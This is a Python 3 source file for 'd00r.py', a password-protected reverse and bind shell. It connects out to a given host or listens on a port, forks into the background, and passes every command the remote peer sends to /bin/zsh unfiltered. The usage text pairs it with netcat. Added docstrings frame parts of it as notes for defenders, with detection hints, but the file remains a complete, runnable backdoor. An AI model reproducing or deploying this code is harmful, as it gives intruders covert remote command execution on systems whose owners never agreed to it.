#!/usr/bin/env python3
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# d00r.py 0.3a (reverse|bind)-shell in python by fQ #
# #
# alpha #
# #
# Reviewed By:tennc #
# date:2014-03-12 #
# run with python3 #
# #
# usage: #
# % ./d00r_py3 -b password port #
# % ./d00r_py3 -r password port host #
# % nc host port #
# % nc -l -p port (please use netcat) #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import os, sys, socket, time
# =================== var =======
# Module-level settings. PW, PORT and HOST start as empty strings and are
# overwritten from sys.argv by the argument handling in the main section.
MAX_LEN=1024  # size argument given to conn.recv() for each command read in action()
SHELL="/bin/zsh -c"  # prefix that shell() prepends to every command string
TIME_OUT=300  # seconds; applied to the socket with sock.settimeout()
PW=""  # session password, compared against the peer's input in action()
PORT=""  # TCP port; converted with int() once the arguments are read
HOST=""  # remote host, only set when the script is started with -r
# =================== funct =====
# shell - exec command, return stdout, stderr; improvable
def shell(cmd):
    """Run ``cmd`` through os.popen and return the captured output as one string.

    The command line is built by plain concatenation: SHELL, a space, then
    ``cmd`` exactly as received. Nothing here validates, quotes or restricts
    ``cmd``; the only caller visible in this file is action(), which passes
    text read from the network connection.

    Only the pipe returned by os.popen is read. No stderr handling is visible
    in this function, despite what the comment above it says.

    Detection note: each call starts a child process of this script whose
    command line contains the SHELL value, so process-creation telemetry
    (an interpreter parent spawning a shell with ``-c``) is a practical place
    to catch this behaviour.

    NOTE(review): indentation was lost in this listing; the nesting below is
    reconstructed from the keywords and should be confirmed upstream.
    """
    sh_out = os.popen(SHELL + " " + cmd).readlines()
    # Join the list of output lines back into a single string.
    nsh_out = ""
    for i in range(len(sh_out)):
        nsh_out += sh_out[i]
    return nsh_out
# action?
def action(conn):
    """Run one password-gated command session on ``conn``.

    Flow, as written:
      1. Call conn.send() with a "Pass?" prompt, then read len(PW) bytes.
      2. If the value read equals PW, send a banner and loop: send a ">>> "
         prompt, read up to MAX_LEN bytes, drop the final element of what was
         read, and hand the remainder to shell().
      3. ":dc" and ":sd" are handled as control words instead of commands.

    Return value (used by the main loop as its ``run`` flag):
      True  -- ":dc" was received, or recv() raised during the session.
      False -- ":sd" was received.
      None  -- implicit, when the password recv() raised or the value read
               did not equal PW.

    Review notes for defenders:
      * The password check is a single ``==`` comparison; this function has
        no attempt counter and no delay.
      * Everything the peer sends after the check is passed to shell()
        without filtering.
      * The prompt and banner strings are fixed literals, and the socket is
        used directly with no encryption layer visible in this file, so the
        literals are usable as network-signature material.

    NOTE(review): indentation was lost in this listing; the nesting below is
    reconstructed from the try/except/else and if/elif/else keywords and
    should be confirmed against the upstream file.
    """
    conn.send("\nPass?\n")
    try:
        # Reads exactly as many bytes as the configured password is long.
        pw_in = conn.recv(len(PW))
    except:
        # Bare except: any failure here is reported as a timeout and the
        # function then falls through, returning None.
        print("timeout")
    else:
        if pw_in == PW:
            conn.send("joo are on air!\n")
            while True:
                conn.send(">>> ")
                try:
                    pcmd = conn.recv(MAX_LEN)
                except:
                    # Any recv failure ends the session but keeps the caller's
                    # loop alive (True).
                    print("timeout")
                    return True
                else:
                    #print("pcmd:",pcmd)
                    cmd = "" #pcmd
                    # Copy everything except the last element of the input
                    # (presumably the trailing newline sent by the client).
                    for i in range(len(pcmd) - 1):
                        cmd += pcmd[i]
                    if cmd == ":dc":
                        # Control word: end this session, caller keeps running.
                        return True
                    elif cmd == ":sd":
                        # Control word: end this session and stop the caller's loop.
                        return False
                    else:
                        if len(cmd) > 0:
                            # Unfiltered peer input is executed and the output
                            # is sent back on the same connection.
                            out = shell(cmd)
                            conn.send(out)
# =================== main ======
# Script body: read the mode and settings from the command line, fork, open a
# TCP socket, then hand each connection to action() until it returns a falsy
# value.
#
# Triage notes for defenders:
#   * The password, port and host come from argv and are then printed, so
#     they are present in the process command line and on the launching
#     terminal's stdout.
#   * The parent exits right after os.fork(), so the launching shell returns
#     while the child carries on with the socket work.
#   * With -b the listener is bound to "localhost" only.
#   * With -r a failed outbound connect is retried after a 5 second sleep,
#     which gives a regular connection-attempt pattern in egress logs.
argv = sys.argv

if len(argv) < 4:
    # Too few arguments: print the usage text and stop.
    print("usage:")
    print("% ./d00r_py3 -b password port")
    print("% ./d00r_py3 -r password port host")
    print("% nc host port")
    print("% nc -l -p port (please use netcat)")
    sys.exit(1)
elif argv[1] == "-b":
    # Bind mode: password and port only.
    PW = argv[2]
    PORT = argv[3]
elif argv[1] == "-r" and len(argv) > 4:
    # Reverse mode: password, port and the host to connect to.
    PW = argv[2]
    PORT = argv[3]
    HOST = argv[4]
else:
    exit(1)

PORT = int(PORT)
# Echoes the password and connection settings to stdout.
print("PW:",PW,"PORT:",PORT,"HOST:",HOST)

#sys.argv[0] = "d00r_py3"

# exit the parent process; only the forked child continues past this point
if os.fork()!= 0:
    sys.exit(0)

#associate the socket
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# The same timeout covers accept(), connect() and recv() on this socket.
sock.settimeout(TIME_OUT)

if argv[1] == "-b":
    # Listener is bound to the loopback name, with a backlog of 0.
    sock.bind(("localhost",PORT))
    sock.listen(0)

run = True
while run:
    if argv[1] == "-r":
        try:
            sock.connect((HOST,PORT))
        except:
            # Any connect failure is reported the same way, then retried
            # after 5 seconds.
            print("host unreachable")
            time.sleep(5)
        else:
            run = action(sock)
    else:
        try:
            (conn,addr) = sock.accept()
        except:
            # Any accept failure (including the socket timeout) lands here.
            print("timeout")
            time.sleep(1)
        else:
            run = action(conn)
    # Per-iteration teardown. NOTE(review): indentation was lost in this
    # listing, so whether this if/else sits inside the while loop or after it
    # is reconstructed -- confirm against the upstream file.
    if argv[1] == "-b" :
        # 2 is the numeric value of socket.SHUT_RDWR.
        conn.shutdown(2)
    else:
        try:
            # Presumably a check that the socket is still usable before the
            # shutdown call below.
            sock.send("")
        except:
            time.sleep(1)
        else:
            sock.shutdown(2)